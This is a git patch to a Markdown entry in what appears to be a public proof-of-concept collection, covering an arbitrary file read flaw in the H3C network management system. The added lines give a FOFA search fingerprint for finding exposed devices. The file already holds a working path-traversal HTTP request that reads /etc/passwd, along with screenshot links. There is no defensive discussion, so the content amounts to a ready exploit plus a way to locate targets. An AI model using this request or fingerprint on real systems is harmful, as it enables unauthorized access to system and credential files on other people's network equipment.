From 0a5e0e736244d9ed6d45243a8ad5a7ada3004502 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 28 Nov 2023 21:09:47 +0800 Subject: [PATCH] =?UTF-8?q?Update=20H3C=E7=BD=91=E7=BB=9C=E7=AE=A1?= =?UTF-8?q?=E7=90=86=E7=B3=BB=E7=BB=9F=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6?= =?UTF-8?q?=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- H3C网络管理系统任意文件读取漏洞.md | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/H3C网络管理系统任意文件读取漏洞.md b/H3C网络管理系统任意文件读取漏洞.md index bc98581..dce4578 100644 --- a/H3C网络管理系统任意文件读取漏洞.md +++ b/H3C网络管理系统任意文件读取漏洞.md @@ -1,9 +1,16 @@ ## H3C网络管理系统任意文件读取漏洞 +## fofa +``` +body="webui/js/jquerylib/jquery-1.7.2.min.js" +``` ## poc ``` GET /webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down HTTP/1.1 ``` +![image](https://github.com/wy876/POC/assets/139549762/e5bc6b46-2181-4d89-bab2-b6c1e2db7bca) + +![image](https://github.com/wy876/POC/assets/139549762/d94b6fad-82fa-49d5-b236-c3a148380aca)